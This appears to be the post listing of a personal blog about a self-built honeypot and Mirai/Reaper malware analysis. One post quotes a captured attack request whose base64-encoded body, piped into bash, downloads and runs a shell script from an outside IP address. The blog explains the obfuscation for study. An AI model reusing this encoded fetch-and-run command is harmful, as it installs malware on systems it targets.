Posts

• Fish Botnet

  The honey pot has caught a fish, so I guess its more of a fishing net?

• Universal card tray

  Tutorial for Universal card tray project that you can find on my thingiverse page

• Masked sh command

  The honey pot picked up an interesting request:

  16:29:23.246 Handling POST to / request from ***.**.***.*
  >>>Headers: honey-pot-ip:8080 Keep-Alive Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 application/x-www-form-urlencoded 179 
  >>>Body: doAs="echo Y2QgL3RtcCB8fCBjZCAvbW50IHx8ICBjZCAvcm9vdCB8fCBjZCAvOyBjdXJsIC1PIGh0dHA6Ly8xNzYuNjUuMTM3LjUvemVyby5zaDsgY2htb2QgNzc3IHplcm8uc2g7IHNoIHplcm8uc2ggJg== | base64 -d | bash"
  16:29:23.246 completed response status 200
  

  The requests body is using echo to pipe text encoded in base64 into GNU base64 decoder to decode it, the decoded out put is then piped into bash (causing bash to execute the decoded text)

• Reverse Engineering Mirai/Reaper Malware

  In my previous post, I showed how I set up a honey pot to capture HTTP requests coming to my IP address. Some of the requests where bots attempting to exploit vulnerabilities in order to gain access to devices and services, one of these requests attempted to inject shell commands to download and run a malware.

• Setting up a basic honey pot

  When playing around with a C# web app library, I noticed the web app I was writing would periodically get random (and sometimes strange) requests from unknown sources, so I thought it would be fun to set up a honey pot and record the requests.

subscribe via RSS